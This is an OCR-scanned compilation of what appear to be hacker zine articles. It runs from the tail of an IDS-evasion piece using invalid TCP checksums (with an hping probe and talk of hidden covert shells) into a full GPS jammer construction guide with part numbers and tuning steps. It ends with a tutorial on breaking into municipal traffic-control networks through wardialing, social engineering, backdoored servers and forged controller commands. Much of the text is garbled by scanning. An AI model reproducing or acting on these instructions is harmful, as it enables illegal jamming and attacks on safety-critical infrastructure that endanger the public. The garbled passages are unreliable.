thinks that they are valid packets and it doesn’t give the configuration 
options to alert for valid or invalid SYN packets. 


--[ 2 -—- Come As You Are 


Ok, so packet filters, even the beautiful OpenBSD 3.2 PF, will have to 
calculate the checksum for every packet? No, to avoid reply spotting they 
could check the checksum only for packets they want to reply. However it should 
be introduced an option to spot broken checksum packets and drop them. 


Some tools that let you alter packets and permit MiM exist, like 
ettercap, and let your host send packets to the right box and after 
logging/altering forward them to the real destination. 


How could we spot the banner trick ? 

echo "SSH-1.99" > /tmp/banner 

hping -S -c 1 -p 22 -E /tmp/banner -d 9 -b mybox 
If you receive a SYN+ACK you can start swearing... 


Note that depends on how the MiM attack is developed. For example 
DSniff check TCP checksum because it works in proxed mode, while 
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ettercap, that uses a non-proxed method, doesn’t. Generally if you don’t 
add such a sanity check in your tool you could be discovered. 


Is this check always needed? No, it’s needed if you want to alter a 
packet or you want to reply to a received packet. So if your tool simply 
sniff packets without sending/modifying them you’re safe. 


Ok, but if I want to safely reply-to/modify packets what is the 
solution? You have 2 solutions: 


1) check the checksum for every packet and work only if correct without 
dropping it in any case; modify/reply-to using a valid checksum. 

2) using Incremental Updating of the Internet Checksum [RFC1141] for 
packets that needs to be modified; checking the checksum for packets you 
want to reply 


Note that incremental updating will keep a checksum broken if it was 
broken and correct if it was correct and it’s really faster than 
calculating it from scratch. 


Curiosity: TCP checksum of a source route packets is invalid while it’s 
in flight, because it is based on the final destination IP address, which is 
altered as the source route is followed (at the destination, it will be 
correct). 


Most default IDS configurations will alert about bad checksumming traffic 
but never log those packets, so the admin couldn’t check the data part and what 
was going on. Generally it’s possible to create a covert shell with a bad cksum 
tunnel on a r00t compromised box and connect to it without being detected. 


Another type of problem could born if the code of a NAT-box/load balancer 
calculate che checksum from scratch. In this case we could bypass an IDS if 
it’s placed between our box and this dumb device. 

Check this interesting example: 


www.oracle.com: 80 


Evil -—-[badSYN]--> Router --[badSYN]--> Load_Balancer [SYN] > WebServer 


| | 
NIDS1 NIDS2 


NIDS1 will see a TCP SYN with invalid checksum while NIDS2, if deployed, will 
see a valid and modifyed SYN. So the webserver will reply to us with a SYN+ACK, 
letting us talk with it while causing a lot of doubts to NIDS1. 

What would you think if you were the security manager and you’ll find such 
different results on NIDS1 and NIDS2 ? 


The solution is always Incremental Updating [RFC1141]. 


--[ 3 - You Know You’re Right 


awgn (31337 H4X0OR) 

raptor & nobody (LSD project) 

batmaNAGA & ALORobin (ettercap authors) 

JWK (OpenBSD addicted) 

Daniel Hartmeier (Mr.Infinite Patience; OpenBSD PF main coder) 
antirez (Hping author) 

Fyodor (Nmap author) 

Ed3f (15b27bed5e11£c0550d7923176dbaf81) 


--[{ 4 - Drain You 

[1] Hping ---> http://www.hping.org 

[2] Nmap ---> http://www.insecure.org/nmap 

[3] Scanlogd ---> http://www.openwall.com/scanlogd 
[4] OpenBSD ---> http://www.openbsd.org 
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oe Project Overview 


A low cost device to temporarily disable the reception of the civilian 
course acquisition (C/A) code used for the standard positioning service 
(SPS) [1] on the Global Positioning System (GPS/NAVSTAR) Ll frequency of 
1575.42 MHz. 


This is accomplished by transmitting a narrowband Gaussian noise signal, 
with a deviation of +/- 1.023 MHz, on the Ll GPS frequency itself. This 
technique is a little more complicated than a simple continuous wave (CW) 
jammer, but tends to be mor ffective (i.e. harder to filter) against 
spread spectrum based radio receivers. 


This device will have no effect on the precise positioning service (PPS) 
which is transmitted on the GPS L2 frequency of 1227.6 MHz and little 
effect on the P-code which is also carried on the Ll frequency. There may 


be a problem if your particular GPS receiver needs to acquire the P(Y)-cod 
through the C/A-code before proper operation. 


This device will also not work against the new upcoming GPS L5 frequency 
of 1176.45 MHz or the Russian GLONASS or European Galileo systems. It can 
be adapted to jam the new civilian C/A-code signal which is going to also 
be transmitted on the GPS L2 frequency. 


That said, it will work against the majority of consumer/OEM GPS 
receivers, provided they are not setup in any advanced anti-jam 
configuration. 


---[ 2 - Why? 
The onslaught of cheap GPS based navigation (or hidden tracking devices) 


over the past few years has made it necessary for the typical citizen to 
take up the fine art of electronic warfare. 
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Several companies[2] now sell "hidden" GPS based tracking devices which 
mount inside or underneath your vehicle. Some transmit the coordinates, 
via cellular phone, of your vehicle’s present and/or past locations for 
weeks at a time without battery changes or court orders! 


Vehicle rental companies have been known to use GPS tracking devices to 
verify you don’t speed or abuse their rental vehicles. The unsuspecting 
renter is often faced with these hidden abuse "fees" after returning the 
rental vehicle. 


Law enforcement agencies are dumb enough to keep track of house arrest 
prisoners with simple GPS based tracking bracelets[3]. Some even use GPS 
for automatic vehicle location (AVL) on their squad cars to allow the 
dispatchers to send in the closest unit to a particular call or to know an 
officer’s location in case of an emergency situation where they can’t use 
their radio. 


Cellular phone companies, trucking companies, private investigators, 
toll-roads, aircraft, those "protect your child" systems and many more 
services are all fully involved with the use of GPS based tracking. The 
problem is, do you really want everyone to know where you are? 


---[ 3 - Technical Description 


This will be a brief description of each of the major sections which 
compromise th ntire jammer device. Refer to the included schematic 
diagram (Appendix B) as you read along. You should also refer to the 
component’s datasheets for even more detailed information. 


Sos'|, Sad Phase Locked Loop 


The jammer’s main oscillator components consist of a Motorola MC145151 
phase-locked loop (PLL) frequency synthesizer chip, a Micronetics M3500- 
1324S voltage controlled oscillator (VCO) module and a Fijitsu MB506 divide 
-by-256 prescaler chip. 


The VCO feeds a portion of its radio frequency (RF) output signal into 
the prescaler chip, where it is divided by 256. A 1575 MHz signal would be 
turned into a 6.15234375 MHz signal. This is then fed into one side of the 
PLL chip. 


The other side of the PLL is fed with a reference frequency which is 
derived from a 10 MHz quartz crystal. This crystal reference frequency is 
divided down 512 times by the PLL to reach 19531.25 Hz. The 6.15234375 
MHz prescaler output frequency is also further divided down 315 times by 
the PLL chip for a final frequency of 19531.25 Hz. This will be the new 
PLL internal reference frequency. That big bad 1575 MHz microwave signal 
now looks like a simple audio frequency to the PLL chip and the supporting 
components. 


The PLL chip internally compares the phase of the 19531.25 Hz VCO side 
signal to the phase of the 19531.25 Hz crystal side signal. The PLL chip 
outputs high or low voltage pulses depending on whether the crystal signal 
is leading or lagging in phase with the VCO signal. These pulses are then 
filtered and dampened into a pure DC control signal via a simple passive 
loop filter. This cleaned up signal is then connected to the VCO’s voltage 
tune control input. 


When everything is working properly, the VCO’s output frequency is locked 
to whatever frequency you programmed into the PLL chip, 1575 MHz in this 
case. It will stay on that frequency even through dramatic temperature 
changes, a problem that a non-PLL VCO would have. If the PLL is not 
working properly, the red "PLL Unlock" LED will be lit. 


Due to a quirk with using low cost, easy to obtain components, you’1ll 
need to tweak two loading capacitors on the reference crystal. This is 
unusual, but necessary to move the signal from the default 1575 MHz to 
the more appropriate 1575.42 MHz (+/- a few hundred Hertz). This is a very 
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important and delicate procedure, and you’1ll need a frequency counter to 
accomplish it. 


-—--[ 3.2 - Noise Generator 


The actual noise generator of the jammer is very simple. A 6.8 Volt 
Zener diode is first biased, buffered and amplified by a single 2N3904 
transistor. This single Zener diode is capable of generating broadband 
noise signals from audio frequencies up to over 100 MHz. We then filter 
this noise signal down to something more practical and something which the 
VCO module can actually respond too. This is done via the LM386 audio 
amplifier chip. The LM386 both amplifies and low pass filters the final 
noise signal. The final LM386 output signal will have enough overhead if 
you need to adapt it for a wideband noise jammer. 


This low frequency noise signal is fed, via a 100 Ohm potentiometer, to 
a simple resistor/capacitor network where it’s mixed with the VCO voltage 
tune control signal (described above). The single 1N4148 diode is to 
prevent any negative voltage pulses from reaching the VCO. 


This mixing results in a new "noisy" voltage tune control signal feeding 
the VCO. The resulting RF signal looks like random noise dancing around 
the center 1575.42 MHz RF carrier. You’ll need to set the deviation of 
this noise to approximately +/- 1.023 MHz from the 1575.42 MHz RF carrier. 
Access to a spectrum analyzer is required to do this properly, or you can 
use an oscilloscope and the included test point voltages to get an 
approximate setup. 


---[ 3.3 - RF Amplifiers 


The VCO’s +7 dBm (5 milliwatts) RF output is first slightly attenuated 
(4 dB) and tapped for the MB506 prescaler input. It then passes through to 
the RF amplifier stages and band pass filter. 


The first RF amplifier is a Sirenza Microdevices SGA-6289. It provides 
about 13 dB of gain to overcome the losses from the resistive attenuation 
pad. It also shows a good 50 Ohm termination for the VCO RF output and 
even helps to drive the final RF amplifier. 


The GPS band pass filter is a 2-pole Toko 4DFA-1575B-12 ceramic 
dielectric filter from Digi-Key[4], part number TKS2609CT-ND. This part is 
optional, but helps clean up the RF spectrum before further amplification. 
The filter’s insertion loss is around 2 dB. 


The final RF amplifier is a WJ Communications AH102. It provides another 
13 dB of gain, with a higher P1dB compression point of around +27 dBm (500 
mW). The AH102 draws the most current of any part, and is not really 


necessary if you’re aiming for a low range, low current, battery operated 
device. 


---[ 3.4 - Voltage Regulation 


Voltage input regulation and filtering is done using standard voltage 
regulator ICs. A LM2940CT-12 12 Volt, 1 Amp low dropout voltage regulator 
is used to regulate the main 12 Volt power line. Standard 78xx series 
regulators are used from there on to provide both the 9 and 5 Volt lines. 
A simple diode/fuse polarity protection scheme is also provided on the 
battery input. The use of an automatic reset fuse is highly recommended. 


You can power the jammer off a common 12 Volt rechargeable battery. 
The 12 Volt, 4.5 Amp-hour, lead-acid battery from Radio Shack[5], part 
number 23-289, is a good choice. Old car batteries, strings of 6 Volt 
lantern batteries or even solar panels will also work. Current draw for 
the completed jammer will be around 300 milliamps. 


-—--[ 3.5 - Antenna 


A radiating antenna is not shown in the schematic diagram and one will 
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need to be purchased or constructed for proper operation. There are 
numerous commercial GPS receiving antennas which will work fine for this 
low power transmitting application. Some of the best pre-made or easily 
assembled microwave antennas can be purchased directly from Ramsey 
Electronics[6]. 


The Ramsey DA25 broadband discone antenna is recommended for omni- 


directional (transmit in a circle) radiating applications. The LPY2 log 
periodic Yagi antenna can be used for directional (transmit in a straight 
line) radiating applications. Using a directional antenna will give you a 


slight increase in overall transmitted RF power, which increases the 
jammer’s range, and can also be used to shield your own GPS receiver from 
being jammed (i.e. point it at the enemy). 


Dielectric GPS patch antenna elements may also be purchased from Digi- 
Key. Toko DAK series elements, Digi-Key part number TK5150-ND, are perfect 
for surface mounting directly to the circuit board. They will require a 
plastic radome to slightly lower their resonant frequency. The small 
antenna element size is also perfect for hidden or portable operations. 


---[ 4 -— Construction Notes 


Unfortunately, proper jammer construction will require fairly advanced 
engineering skills. Prior knowledge of high frequency microwave circuits 
and printed circuit board (PCB) design is required. A good start for the 
beginner is by reading the "UHF/Microwave Handbook" and "The ARRL Handbook" 


both published by the Amateur Radio Relay League (ARRL)[7]. Access to 
fundamental RF test equipment (oscilloscope, frequency counter, spectrum 
analyzer, loads, attenuators, etc.) is also required. 

---[ 4.1 - Component Purchasing 


The main VCO module and RF amplifiers can be purchased from Richardson 
Electronics[8]. Part number M3500C-1324S for the VCO module and part 
numbers SGA-6289 and AH102 for the RF amplifiers. Equivalent VCO and RF 
amplifiers can be purchased from companies such as Mini-Circuits[9] or 


Synergy Microwave[10]. Slight component changes may be required if using 
alternate components to take into account different operating voltages and 
input/output RF power requirements. The PLL loop filter may also need 


tweaking if you use a different VCO module. 


The MC145151 PLL synthesizer chip can be purchased from Digi-Key. There 
are several pin packages available (leaded or surface mount), choose the 
one suitable for your application. The small 28-SOIC surface mount package 
is part number MC145151DW2-ND. You may also be able to salvage MC145151 
chips from older CB radios or older C-band satellite receivers (the kind 
that where tuned via DIP switches). 


Digi-Key also handles an equivalent prescaler IC, the NEC UPG1507GV, part 
number UPB1507GV-ND. This is an exact replacement for the Fijitsu MB506, 
but the main drawback to the UPG1507GV is that it is in a 8-SSOP package 
(i.e. very small) and is fairly difficult to work with using standard 
soldering tools. 


The 10 MHz crystal is also available from Digi-Key, part number 
300-6121-1-ND. Other miscellaneous components may also be purchased from 
Digi-Key (capacitors, resistors, voltage regulators, inductors, 

diodes, transistors, LM386, project box, RF connectors, etc.) as their 
prices are the most competitive and their service is outstanding. 


---[ 4.2 -— Layout 
No PCB pattern is available, you’ll have to layout the project by hand 
using felt-tip markers, drafting tape, dry-etch or iron-on transfers. You 


should make your own PCB pattern to fit your application specifically. 


The PCB layout isn’t that difficult or challenging, but will require 
prior experience and patience. Using all surface mount components and good 
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board layout practices will reduce the jammer’s physical size and cost 
tremendously. 


The use of high frequency, double sided copper clad laminate is essential 
for properly working microwave circuits. GIL Technologies[11] GML1000 
(2-side, 1 oz., 0.030") is a good choice but standard FR-4 laminate will 
work in a pinch. You can purchase 6" x 6" FR-4 (2-side, 1 0oz., 0.030") 
laminate from Digi-Key, part number PC45-S-ND. 


A 50 Ohm micro stripline on 0.030" GML1000 PCB laminate will be about 70 
mils (1.8 mm) wide and on FR-4 it will be about 55 mils (1.5 mm) wide. Be 
sure to keep any micro stripline carrying RF signals short, straight and 
perpendicular to any DC bias line or any other micro stripline it has to 
cross. 


The 2 mm wide line in the dry-etch transfer package from Radio Shack, 
part number 276-1490, will work O.K. on both materials for creating 
homebrew micro striplines which are close enough to 50 Ohms. 


A 


The two RF amplifiers, band pass filter, VCO and prescaler PCB patterns 
will all require numerous ground vias connecting the top and bottom ground 
planes. These help prevent ground loops and instability (oscillations) 
from disrupting proper circuit operation. In the case of the AH102, they 
even provide some heat sinking to allow cooler operation of the final RF 
amplifier. 


Any resistors, capacitors or inductors used in the RF sections should be 
in a 0603, 0805 or 1206 size surface mount package. Leaded components will 
not work at this high of a frequency. Be sure your choice of surface mount 
inductors can handle the current when used as part of the DC bias on the 

RF amplifiers. The ferrite bead shown in the schematic can be any salvaged 
ferrite bead. The inductor assortment package at Radio Shack, part number 
273-1601 should have a couple of them in it. 


--[ 5 - Operation 


Once the jammer is operational, you can practice testing it by monitoring 
the signal on a common consumer GPS receiver or high quality communications 
receiver. A GPS receiver close to the jammer will not be able to acquire 
C/A-code lock and any operating GPS in the jammer’s radiation pattern will 
lose C/A-code lock. Higher quality GPS receivers tend to be less 
susceptible to low power jamming, so you’1ll need to be in the antenna’s 
near-field radiation pattern (i.e. close) for it to work. 


Any obstructions near the jammer’s own antenna (trees, houses, hills, 
walls, etc.) will decrease the jamming range. The best placement is where 
the jammer’s antenna is line-of-sight to the antenna of the GPS receiver 
you're trying to jam. Real world results will vary drastically, but you 
should be able to obtain a jam radius of a few hundred feet even in heavily 
obstructed areas with the higher power (AH102) option and a simple antenna. 


You can even practice counter-jamming methods to protect yourself against 
hostile or accidental GPS jamming. Try to shield your GPS receiver from 
the interference source by placing your body, trees, hills, rocks or other 
obstructions in-between your position and the interference. More advanced 
methods involve using directional or steerable phased-array antennas on 
your GPS receiver (pointed skyward) to nullify any ground based 
interference. 
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http://www.spacecom.af.mil/usspace/gps_support/gps_documentation.htm 


[2] GPS-Web 
http://www.gps-web.com 
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http: //www.ramseyelectronics.com 


7] Amateur Radio Relay League 
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http://www.rell.com 


9] Mini-Circuits 
http://www.minicircuits.com 


10] Synergy Microwave 
http://www. synergymwave.com 
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http: //www.gilam.com 
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--[{ Appendix A: Links to Datasheets 
Alternate component manufactures may be substituted in most cases. 


* Fairchild Semiconductor 2N3904 NPN Transistor 
http://www.fairchildsemi.com/ds/2N/2N3904.pdf 


* Micronetics M3500-1324S VCO 
http://www.micronetics.com/pdf/vcol324.pdf 


* Motorola MC145151 PLL Frequency Synthesizer 
http: //e-www.motorola.com/brdata/PDFDB/docs/MC145151-2.pdf 


* National LM2940-12 Voltage Regulator 
http://www.national.com/ds/LM/LM2940.pdf 


* National LM386 Audio Amplifier 
http: //www.national.com/ds/LM/LM386.pdf 


* National LM78L05 Voltage Regulator 
http: //www.national.com/ds/LM/LM78L05.pdf 


* NEC UPB1506/07GV Prescaler 
http: //www.cel.com/pdf/datasheets/upb1506.pdf 


* Sirenza Microdevices SGA-6289 RF Amplifier 
http://www.sirenza.com/pdf/datasheets/sga/89/sga-6289.pdf 


* STMicroelectronics 78M09 Voltage Regulator 
http://eu.st.com/stonline/books/pdf/docs/2146.pdf 
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* Toko DAK1575MS50T Dielectric Antenna 
http: //www.toko.com/passives/antennas/pdf/DAK1575MS50Tws.pdf 


* Toko 4DFA-1575B-12 Dielectric Band Pass Filter 
http: //www.toko.com/passives/filters/dielectric/4dfa.html 


* WJ Communications AH102 RF Amplifier 
http: //www.wj.com/pdf/AH102.pdf 


--[ Appendix B: Schematic Diagram - gps_jammer.ps.gz (uuencoded) 


Below is the schematic diagram (gps_jammer.ps) in an uuencoded gzipped 
PostScript file. This is the native Xcircuit[12] format and is used for 
ease of viewing, printing and modification. 


<++> ./gps_jammer.ps.gz.uue 


begin 644 gps_jammer.ps.gz 
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| [ Traffic Lights ] | 


| [ plunkett@hush.com ] | 
.:Saving the planet, again:. 


/ 
This is purely educational; 

Any knowledge gained from this document is self imposed and thus 

the author cannot be held responsible. Any activities resulting from 
knowledge gained in this document is not accountable by the author. 
If you do not accept this, please refrain from reading further. 


+ + + + + F F 


/ 


#finclude <disclaimer.h> 


A more environmentally friendly way of traveling by car. As some 

of you might recall in almost all the hacking movies, books, TV shows, etc. 
there has been a case of someone fiddling with traffic lights. Well we all 
just giggled at the unrealistic aspect of it and didn’t think twice. Well in 
my quest for a more appealing planet for our children I felt compelled to 
think of a way in order to reduce the amount of pollution emitted by 
vehicles of today. 
Standing at a intersection, nobody else around, you’re still stuck behind the 
red light, and this invisible barrier of governmental guilt has enough power 
to let you wait there and pollute the air more and more, just for a measly 
green light. Wouldn’t it be leet having a laptop in the car where you could 
just select the intersection off a list, change the timing or current stream 
running, and ride off with fewer time wasted and fewer pollutants exhausted 
and a clear conscience. 


Now, enough crap about the reasons, now for the technical shit. 


Today’s traffic controlling system is a well oiled redundant network that 
utilizes the same protocols that we are all aware of. Yes it is hackable 
and it is like in the movies. :) 

here we go! 


a description of some of the terms used. 


—- controller 
This is the technical term for a traffic light and will be 
referred to that way. 

-— ULC 
Urban Traffic Control, solid-state signal controllers connected 
to central computer by means of PSTN. Provides communication 
standard for controllers (see fig. 1) 

— SCOOT 
Split Cycle Offset Optimization Technique. 


A standard now implemented across majority of traffic systems 
across the world. It provides adaptive control of controllers, 
this is done by the controlling office, it receives the traffic 
flow data from closed loops around the intersection, which it 
analysis and relays back current configurations in real-time 
back to the controller. 


- ITS Intelligent Transport Systems, This is just a buzzword to describe 
he whole system covering everything, UTC, SCOOT, CCTV(video) and 
the whole protocol stack interlinking all of it. (see fig. 2) 


dt 


= NTCLIP 


This is the protocol that is in process of becoming a standard 
for traffic management communications. It is based on TCP/IP and 
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revolves mainly on SNMP that has specific MIB’s for use in 
controller messaging. (protocol may vary from country to country) 


Some controllers in US are NTCIP compatible, 


namely Thereon and model 


170 of NEMA controllers. CCTV, VMS, Field Processors, Ramp metering 


are all linked via NTCIP. 


- ATC 


Area 


[Traffic Control, This is the Central office that control 


all the aspects of traffic control management. 


Front End Processor, Virtual Processing for 


controllers. located 


before management computer, and connected directly to controllers 
via instation modem rack or telemetry hardware. One FEP 


supports up to 512 PSTN lines. 


— OTU 


n UK this is the Outstation Transmission Unit, this provides the 


I 

means of converting serial data coming from 
to parallel data for use in the controller, 
i 
( 


nterchangeability of controllers. 


Unit} 
— CMU 


the central computer 
and provides 


I’m not sure if this system is a standard across the world, for 
South Africa it is done by a CCIU Controller Communication Interface 


Cabinet Monitoring Unit, This is what detects when you fiddle inside 
the box next to the road. It reports hardware/software faults and 


packages the data for reporting to the FEP and ATC. 


Figure 1. Different link arrangements 


---0O junction 1 


0 0 O junction 2 
CENTRAL LOCAL \ 
OFFICE EXCHANGE ---0 junction 3 


[UTC Radial Arrangement ] 


---0O junction 1 
/ \ 
Q=SsSSSs55252 0 \ 
I O-- junction 2 
i: 
/ 


0 junction 3 


(@) 
Oo 
= 
a] 


[UK Multi-drop UTC arrangement ] 


Figure 2. ITS Topologies 


| COMPUTER | -—- | COMPUTER | ------ | COMPUTER | 


‘N , . , N , 


(coax) —— | (dialup) 


| CONTROLLER | - | | MASTER 


(radio) 


| VAX/VMS |-| | VAX/VMS |__| |CCTV CAMERA|__ | 


| 
ee ee eee ee ee eae eee 
| COUNTSTION | - | | CONTROLLER|___| | CONTROLLER |__| 
i, Sea alin LP RO Mae alg , eect ec ee teas ain eran ye , WS oe sheet ene tein ec enp jae , | 
| 
| VAX/VMS | 
OO ee es v 
(Physical links (Physical links (physical links 
EIA 232) FSK-modem) Fiber) 


Introduction 


; 
qd 


he traffic controller boxes that you see on the road have all a standard 
onfiguration set when commissioned, but they are all linked to a central 
ffice for remote configuration changes, fault reporting, resetting, etc. 

The ATC houses a FEP which connects to each controller or the local exchange. 
he FEP is the direct network connection to the controllers and queries the 
ontrollers per second bases and receives the responses which are transported 
o the central controlling computer [0S/2 or ALPHA VAX in S.A and UK] via 
ECnet on coaxial or other means via the LAN. The controlling computer then 
nalysis the result and determines faults or other data and places it in the 
entral controlling database on a VAX/VMS. The database is then prioritized 
nd can be accessed via web interface on the local intranet to see fault 
eports and timing info. 


c 
[e) 


} 


be aQae Uta 


When a reconfiguration is issued, an operator can set all configurations 
remotely even if a total controller reset is required. This includes stream 
timings (streams are the various timing configurations), local time, light 
dimming, emergency stream (for ambulances and such), the different settings 
will be discussed later. When the operator requests a change in configuration, 
it is sent to the FEP in a large datagram which is split up and modulated 

for communication to the controller. The protocols between the OTU/CCIU and 
the FEP is usually not a standard, and propriety protocols are setup by the 
manufacturers of the units. 


a diagram of how UTC is interlinked is shown. (fig. 3) 


figure 3. Protocol and physical link diagram of UTC system 


ATC IN CONTROLLER BOX 
| UTC COMPUTER | RS232 SERIAL 
\------------ : : SERIAL 
DECnet-> | |MODEM |-/--|MODEM|----- | OTU/CCIU| 
TCP/IP = |--------- | FEP |_| | RACK |: ‘----- j \-------- : 
ETHERNET LSS aad | er to ies: | RS232 
LAN => : | SERIAL 
(NTCIP encompassed) : | = 
protocols : | CONTROLLER | 
. a gO a v 
—— | 


misc. devices 
like VAX/VMS for 
fault monitoring 
and such. 


The communication between the controller and the ATC is done via a 
bit stream signals where certain bits represent a preprogrammed 
function in a controller. 

A serial second-by-second bit stream is received by each controller 
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continuously and is converted to parallel for use inside the controller. 


The stream consists of 16 bits, Thus 32 parallel connections can be initiated 


with the controller, and certain bit streams control certain functions and 
some have a return value for example to notify the controller which stream 
currently is running. The communication may look similar to this. 


1001011011011101 sent 
1000101111010101 received 


as said, the comms protocol is more than likely to be propriety and thus non 


standard. eg. The control bit 10 may ’mean set max green time 30s’ and in 
another, ’hold vehicle stage’. but according to ATC standards globally, 
there are a couple of standards like stream control, emergency control 
and resets and more nifty features. 


But this is not important because access to the controlling computer is in 
anyway necessary for control of the controller, and thus the specific 
protocol used doesn’t matter. 


communication technical details, yummy! 


UTC messaging 


Below is a typical description of the communication between the controller 
and ATC. UTC is the current system that is used in majority of ATC 

centers across the world. And communication is pretty much standard. 

The specific messaging data bits might be different in different 

countries since it is done proprietly by the controller and system 
manufacturers. But they tend to stick to a standard, South Africa is based 
on the UK system, And the UK system is the same as America, and so it all 
will look basically the same, except for area specific functions. 


UTC Control and Reply Bits (Fn = F1,F2,F3... different stages, same for Dx) 

Control Description Reply 

Dn (or Dx) Demand Individual Stage SDn/SDx 

Fn Force Stage 

FM Fall Back Mode FC 

HI Hurry Call Inhibit 
Stage Confirmation, Stage n Gn 
Hurry Call Confirmation or Reqst HC 
Manual Control MC 
Emergency Vehicl EV 
Vehicle Red Lamp Failure 1 RE 1 
Vehicle Red Lamp Failure 2 RE 2 

SFn Switch Facility sCn 

SO Solar Override 

SG CLF Group Timer Synchronization CG 

LO Lamps On/Off LE 

LL Local Link Inhibit 

TS Time Switch Sync Stored Value 

TO Take Over 

TC Transmission Confirm 

CR Close Car Park CL 
Detector Fault Monitor DF 
CLF Group Timer in First Group GR1 
Remote Reconnect RR 
Entry in Controller Fault Log CF 
Handset Connected TE 
Lamp Fault LFn 
Car Park Occup Thresh Exceeded CA 
Pedestrian Green Confirm PC 


Queue Detector Presence VO 
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Detector Vehicle Count VC 
Car Park Information CSn 
Queue at Car Park Entry Reservoir CR 
SCOOT Detector Presence Vsn 
Cabinet Door Open CO 
PV Hold Vehicle Stage 
PX Demand Pedestrian Stage 
Puffin Clearance Period PR 
Vehicle Green Confirm GX 
Wait Indicator Confirm WI 


A controller is typically setup to receive 16 to 32 bits of control bits 
which can be be replied to by the controller using a reply datagram. 
(note that SCOOT specific functions are done in the same way) 


typical Control UTC message: 


Bytes 1,2 Control Bytes (Address 2) 
Byte 3 (F1,F2,F3,D2,D3,DX,S0O,-) (check above table for bit descr) 
Byte 4 (-,-,-,-17-,7-17-,TS) 


OO 0202 0220: Ts. OF Oe B02: Oe 20) Ts. O O- 2020 02 0" 20) s02'0 
typical Reply UTC message: 
Bytes 1,2 Reply Bytes (Address 2) 


Byte 3 (G1,G2,G3,-,-,DF,CF,-) (check above table for bit descr) 
Byt 4 ( v £ v v v Fa v RT) 


On00%00' Oo -T 0.0. O00) sO: 2000-0. 00° <0: 00 


The communication is done asynchronously and in the controller represented 
as parallel, whereas in the FEP its serial. The modulation can be done 
either by FEP or instation specific controller cards. 


NTCIP Messaging (UK and some US ATC’s) 


IT am not going to discuss the specific NTCIP messaging system because it 
is not set as a standard yet, and basically, because I haven’t had the 
pleasure of playing with it. America (except NY and other big 

cities), South Africa, Namibia and I think majority of countries 

across the world still use SCOOT capable UTC primarily whereas 

UK is adopting it as standard. 


The NTCIP stack: 


Layer Class A Class B Class C 


Application (7) SNMP/STMP SNMP / STMP SNMP /STMP /FTP 
Presentation (6) - - - 

Session (5) 7 - = 
TCP/UDP 


Transport (4) UDP = 

Network (3) IP Null IP 

Data Link (2) HDLC HDLC HDLC 
Physical (1) RS232/FSK RS232/FSK RS232/FSK 


A and C are not standard but could be used. For 
tcp compatibility and routing. 
A and C can be implemented as well as additional TCP/IP stacks. 


B is defined as standard and is used for bandwidth efficient exchange of 
data but does not provide assurance of delivery, this is in turn done 
by the physical layer for necessary retransmission. 


B only contains three layers, application, data link, physical layer. 
This is because the constant line between office and controller is fixed 
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and thus no routing is necessary and SNMP includes the session features. 
NTCIP and SNMP and some STMP: 


SNMP commands: 
-get 

-set 

-get Next/get Bulk 
-trap 

The manager (ATC) may send out ‘get’ command to retrieve information from 
the agent (CONTROLLER) and waits for a reply. But SNMP does not provide 
for the agent to initiate contact, and thus the manager polls periodically 
with the ’trap’ command. This is done on a per second basis. 


The typical SNMP frame is 37 Bytes 


ver|community|command|req id|error status|/error index|objct id]objct value| 


ver= 
SNMP vl -NTCIP v2 included security features which they thought 
was a waste of bandwidth- ;) 

Td" £iag= 


is used for matching up the messages with replies 


community name= 
essentially a password 


core message in Object ID and Value= 
the controller control data and reply section 


SNMP is a bandwidth eating protocol, so they designed the STMP 

(simple transportation management protocol) which is a cut down vers of SNMP. 
It uses the same commands but has the added benefit of having no header and 
using dynamic objects. Dynamic objects can encompass a number of variables 
like time, date, year and all in one object. The objects are defined online 
and both the instation and outstation parties know what the object describes 
and thus just a single value needs to be transmitted. The typical size of 

an STMP message is 1 byte, with a maximum of 13 dynamic objects. 


Comparison Between UTC and NTCIP Messaging 


UK UTC NTCIP Class B 
Polling cycle 1s 1s 
Message size Fixed Variable 
Device Variables 
transmitted All Only parameters to be changed 
Value of device 
variable Bit Integer or Bit 
Protocols Proprietary Standardized 


Hacking the Traffic lights GOdDamnit! #S@#Z@#% 


ea) 
6B 


Ok I wanna save the environment now, with my new Uhb 
technique. 


Basically, the idea is to get access to the VAX/VMS database or the controlling 
computer itself. Now since this is on a internal LAN, and runs on DECnet 
we have to find clever ideas to get in. 


Some social engineering can help you a whole lot. 
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Phone your local municipality, or check out websites, newspapers or 

anywhere, where specifically, the ATC is situated. Now you will get the contact 
numbers of people who work there or such, maybe a fault reporting number. 
Fire up your wardialer and start scanning the prefix. They should have 

a server where they dialup to commission a new controller or when a new 
software d/l is needed in the field. In South Africa this is a computer 
running DOS with pc-anywhere on. But if they are clever, like all of the 
centers I’ve seen, they would have a dial-back facility, if not, your in luck 
cause then you are directly linked to the internal LAN, and should start 
hacking the VAX or FEP. The FEP note, is normally a propriety system, like 

in South Africa, runs on DOS with some major serial comms protocols. Better 
the get access to the VAX/OS2 controlling computer for a more familiar 
system, although the FEP has more control of controller system messages. 

And you can access the serial connections to the modems directly. 


If you are unlucky and have a clever ATC. You must devise another means of 
access to the internal LAN. In my experience the LAN is always connected to 
the local municipality WAN for mail purposes and for access to the local 
intranet for database driven fault reporting. Now to gain access to the local 
WAN is not that difficult, since they are usually very big and provide 
gazillion services like websites, mail servers for municipal workers and such. 
Now HaxOr a web server or something and backdoor it *VERY* *VERY* well. You 
gonna need it a lot, maybe backdoor a couple. :) 


Now on the local WAN, you can probably access the nameserver to the ATC LAN 
or you can access it directly. I’m not providing a tutorial on hacking, just 
means of access, so sniff email, network traffic blah blah... till you get 
access to the VAX or controlling computer. 


Now once your in, backdoor it *VERY* *VERY* *VERY* well ;) 

you should use all the vax hiding tools and shit, look thru phrack for VAX/VMS 
hacking. There are a couple of nice SHOW USER hiding tools and stuff 

written by mentor and a few others. And once you are in, check 

what is on the DECnet, and maybe see if it is linked to other ATC’s. 

From here you can access the controlling computers, FEP’s and everything. 

Try to see the serial connections directly via FEP or see the communication 
from the controlling computer, so you can figure out the format of messaging 
controllers. Or if you are lucky, you can access the program itself 

used for messaging, if its terminal friendly. 


Now find a controller that you have the location for, the addresses ar 
pretty easy to figure out most of the time or just browse through the 

VAX database of fault reports or check the local intranet. Now construct 

a suitable message and datagram from captured data, and make it do something 
noticeable like: UTC message — PX DEMAND PEDESTRIAN STAGE 
Hopefully, you have a laptop or something, go down to the controller 

that you intend to send the message to. Now you will notice that all this is 
done over tcp/ip, since you link to the LAN where you get onto the VAX/VMS 
D 
a 


ECnet and in turn the controlling computer/FEP. So send through the command 
nd watch if the controller obeys you. If it does then you can start script 
the whole procedure ;). make nice timings for ENVIROMENTLY friendly travels 
